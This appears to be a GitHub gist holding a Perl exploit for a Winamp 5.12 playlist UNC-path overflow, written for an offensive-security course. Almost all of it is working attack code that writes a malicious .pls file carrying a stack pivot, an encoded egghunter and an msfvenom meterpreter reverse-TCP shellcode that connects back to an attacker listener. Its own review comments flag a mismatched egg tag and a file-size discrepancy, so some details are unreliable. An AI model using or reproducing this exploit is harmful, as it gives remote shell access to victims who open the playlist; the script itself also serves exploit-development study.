@mgeeky
Created March 16, 2017 18:36
My version of the Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit, written for the occasion of the OSCE/CTP course. Original PoC by Umesh Wanve (umesh_345@yahoo.com).
#!/usr/bin/perl -w
# ====================================================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# Original Poc by Umesh Wanve (umesh_345@yahoo.com)
# Exploit crafted by Mariusz B. / mgeeky (for the occasion of OSCE/CTP, 2017)
# ====================================================================
# Playlist header plus the opening of a UNC path ("\\"): the overflowing
# computer-name field is whatever follows "File1=\\" in the .pls file.
$start = "[playlist]\r\nFile1=\\\\";
# 8-byte tag that stage 2 (the egghunter) scans memory for; stage 3 starts
# with this exact string so the hunter can locate the final payload.
$egg = "T00WT00W";
# Saved return address is overwritten with CALL ESP at 0x0202d961 inside
# in_mp3.dll (no ASLR, no NX, no rebase per the original note). pack('V')
# emits the address little-endian, i.e. "\x61\xd9\x02\x02".
$retaddr = pack('V', 0x0202d961);
#
# Stage 1: two "sub esp, 0x58" (0xb0 bytes in total) followed by "jmp esp",
# intended to land in stage 2 (the egghunter) placed before the return
# address in the file. NOP-padded up to the 11 bytes this slot is sized for.
#
$stage1 = ("\x83\xec\x58" x 2) . "\xff\xe4";
$stage1 .= "\x90" x (11 - length $stage1);
#
# Stage 2: Alphanumeric encoded Egghunter (original version, by Matt Miller). Egg: W00TW00T
#
# NOTE(review): the tag actually placed in memory is $egg ("T00WT00W" on line
# 18), not "W00TW00T" as the line above says. The encoded bytes below cannot be
# read to confirm which tag the hunter compares against, so if the hunter never
# finds stage 3, check that the two agree first. The leading bytes appear to be
# the encoder's fnstenv-based GetPC stub; the real hunter presumably only exists
# after the stub decodes it in place at run time.
#
$stage2 = "\x89\xe7\xdd\xc4\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" .
"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x31\x76\x6f\x71\x7a\x6a\x59\x6f\x66\x6f\x42" .
"\x62\x61\x42\x42\x4a\x35\x52\x52\x78\x7a\x6d\x46\x4e\x67" .
"\x4c\x34\x45\x53\x6a\x73\x44\x68\x6f\x48\x38\x52\x74\x70" .
"\x30\x54\x70\x56\x37\x6c\x4b\x48\x7a\x4c\x6f\x72\x55\x48" .
"\x6a\x4e\x4f\x30\x75\x59\x77\x49\x6f\x6a\x47\x6a\x30\x41\x41";
# NOP-pad to the fixed 166-byte slot. A blob longer than 166 bytes makes the
# repeat count negative, which yields "" and is then caught by the length
# check before the file is written.
$stage2 .= "\x90" x (166 - length($stage2));
#
# Stage 3: Alphanumeric encoded meterpreter on reverse tcp.
#
# Starts with the 8-byte egg so the stage-2 hunter can locate it; the hunter is
# expected to jump just past the tag, into the 4-NOP slide and then the
# alpha_mixed decoder stub, which unpacks the real payload at run time.
#
$stage3 = $egg;
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.XXX LPORT=4444 -e x86/alpha_mixed -f pl
# NOTE(review): LHOST above is a placeholder. The encoded bytes below embed the
# LHOST/LPORT that were used when this blob was generated, so changing the
# listener means regenerating the blob (and re-checking that it still fits the
# 856-byte slot), not editing the comment or the bytes in place.
$stage3 .= "\x90\x90\x90\x90" .
"\x89\xe6\xdd\xc0\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x6b\x4c\x59\x78\x6b\x32\x67\x70\x67\x70" .
"\x77\x70\x65\x30\x4d\x59\x58\x65\x35\x61\x4f\x30\x52\x44" .
"\x4e\x6b\x66\x30\x56\x50\x4c\x4b\x63\x62\x54\x4c\x4e\x6b" .
"\x42\x72\x77\x64\x6e\x6b\x73\x42\x36\x48\x46\x6f\x78\x37" .
"\x30\x4a\x34\x66\x74\x71\x69\x6f\x4e\x4c\x45\x6c\x43\x51" .
"\x63\x4c\x74\x42\x66\x4c\x71\x30\x4f\x31\x7a\x6f\x34\x4d" .
"\x33\x31\x4a\x67\x6a\x42\x6b\x42\x51\x42\x31\x47\x6c\x4b" .
"\x31\x42\x36\x70\x4e\x6b\x42\x6a\x75\x6c\x6e\x6b\x62\x6c" .
"\x52\x31\x33\x48\x4a\x43\x62\x68\x63\x31\x58\x51\x46\x31" .
"\x6c\x4b\x70\x59\x75\x70\x46\x61\x69\x43\x4c\x4b\x67\x39" .
"\x67\x68\x79\x73\x54\x7a\x42\x69\x4e\x6b\x64\x74\x6c\x4b" .
"\x37\x71\x48\x56\x64\x71\x79\x6f\x4e\x4c\x6b\x71\x5a\x6f" .
"\x76\x6d\x53\x31\x49\x57\x70\x38\x6b\x50\x42\x55\x5a\x56" .
"\x43\x33\x73\x4d\x68\x78\x35\x6b\x61\x6d\x36\x44\x63\x45" .
"\x7a\x44\x61\x48\x6e\x6b\x71\x48\x56\x44\x37\x71\x6b\x63" .
"\x32\x46\x6c\x4b\x56\x6c\x62\x6b\x6c\x4b\x63\x68\x47\x6c" .
"\x77\x71\x6b\x63\x4e\x6b\x47\x74\x6e\x6b\x36\x61\x6e\x30" .
"\x6b\x39\x50\x44\x65\x74\x54\x64\x33\x6b\x31\x4b\x31\x71" .
"\x32\x79\x62\x7a\x42\x71\x4b\x4f\x59\x70\x61\x4f\x63\x6f" .
"\x71\x4a\x4c\x4b\x57\x62\x38\x6b\x4e\x6d\x71\x4d\x35\x38" .
"\x50\x33\x35\x62\x77\x70\x67\x70\x31\x78\x54\x37\x73\x43" .
"\x45\x62\x53\x6f\x30\x54\x70\x68\x50\x4c\x42\x57\x31\x36" .
"\x53\x37\x6b\x4f\x6e\x35\x38\x38\x4e\x70\x47\x71\x43\x30" .
"\x33\x30\x37\x59\x68\x44\x62\x74\x50\x50\x71\x78\x61\x39" .
"\x6f\x70\x70\x6b\x37\x70\x79\x6f\x39\x45\x31\x7a\x46\x65" .
"\x33\x58\x6f\x30\x79\x38\x73\x54\x35\x67\x45\x38\x54\x42" .
"\x77\x70\x77\x61\x43\x6c\x6e\x69\x78\x66\x76\x30\x32\x70" .
"\x66\x30\x56\x30\x37\x30\x32\x70\x37\x30\x56\x30\x32\x48" .
"\x68\x6a\x54\x4f\x6b\x6f\x6d\x30\x59\x6f\x79\x45\x6c\x57" .
"\x71\x7a\x34\x50\x71\x46\x50\x57\x73\x58\x4d\x49\x59\x35" .
"\x71\x64\x55\x31\x49\x6f\x7a\x75\x4b\x35\x79\x50\x73\x44" .
"\x56\x6a\x49\x6f\x42\x6e\x66\x68\x31\x65\x4a\x4c\x5a\x48" .
"\x70\x61\x65\x50\x73\x30\x65\x50\x71\x7a\x67\x70\x71\x7a" .
"\x77\x74\x33\x66\x33\x67\x30\x68\x77\x72\x6e\x39\x58\x48" .
"\x73\x6f\x79\x6f\x39\x45\x6c\x43\x68\x78\x77\x70\x73\x4e" .
"\x76\x56\x4e\x6b\x66\x56\x42\x4a\x37\x30\x35\x38\x43\x30" .
"\x44\x50\x57\x70\x73\x30\x56\x36\x43\x5a\x47\x70\x63\x58" .
"\x70\x58\x4f\x54\x70\x53\x4d\x35\x79\x6f\x68\x55\x6c\x53" .
"\x30\x53\x30\x6a\x37\x70\x52\x76\x63\x63\x46\x37\x52\x48" .
"\x55\x52\x48\x59\x5a\x68\x71\x4f\x39\x6f\x7a\x75\x4f\x73" .
"\x59\x68\x57\x70\x61\x6d\x46\x42\x33\x68\x35\x38\x75\x50" .
"\x33\x70\x33\x30\x75\x50\x50\x6a\x45\x50\x30\x50\x75\x38" .
"\x44\x4b\x66\x4f\x56\x6f\x50\x30\x59\x6f\x69\x45\x32\x77" .
"\x73\x58\x44\x35\x62\x4e\x42\x6d\x45\x31\x79\x6f\x4b\x65" .
"\x31\x4e\x53\x6e\x39\x6f\x56\x6c\x47\x54\x4a\x49\x51\x61" .
"\x39\x6f\x39\x6f\x49\x6f\x73\x31\x6a\x63\x71\x39\x6a\x66" .
"\x70\x75\x68\x47\x49\x53\x4d\x6b\x48\x70\x6f\x45\x4d\x72" .
"\x51\x46\x50\x6a\x37\x70\x52\x73\x69\x6f\x78\x55\x41\x41";
# NOP-pad to the fixed 856-byte slot (a longer blob gives a negative repeat
# count, i.e. "", and is then rejected by the length check below).
$stage3 .= "\x90" x (856 - length($stage3));
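# Remainder of the playlist after the oversized computer name.
$end = "\r\nTitle1=pwnd\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n";
# Every stage is padded to a fixed size above; an over-long stage would get an
# empty pad ('x' with a negative count) and shift every offset after it, so the
# sizes are verified before anything touches the disk.
die "Stage1 is of wrong length" unless (length($stage1) == 11);
die "Stage2 is of wrong length" unless (length($stage2) == 166);
die "Stage3 is of wrong length" unless (length($stage3) == 856);
# On-disk layout (same order as the original prints): playlist header and UNC
# prefix, stage 3 (egg + meterpreter), stage 2 (egghunter), the CALL ESP
# return address, stage 1 (stack pivot), playlist trailer.
my $payload = $start . $stage3 . $stage2 . $retaddr . $stage1 . $end;
# Three-arg open on a lexical handle, every I/O call checked. binmode keeps
# Perl from translating "\n" (in the "\r\n" separators or inside shellcode)
# on Windows, which would change the byte count and misalign the overflow.
open(my $out, '>', 'exploit.pls') or die "Cannot create exploit.pls: $!";
binmode($out) or die "binmode on exploit.pls failed: $!";
print {$out} $payload or die "Write to exploit.pls failed: $!";
close($out) or die "Close of exploit.pls failed: $!";
# The original note says the file must be 1121 bytes. Summing the fixed parts
# built here (20-byte $start, 856, 166, 4, 11 and the 58-byte $end) gives 1115
# by my count, so the actual size is reported and should be confirmed against
# the offset that reaches the return address on the target.
printf "Wrote exploit.pls (%d bytes)\n", length($payload);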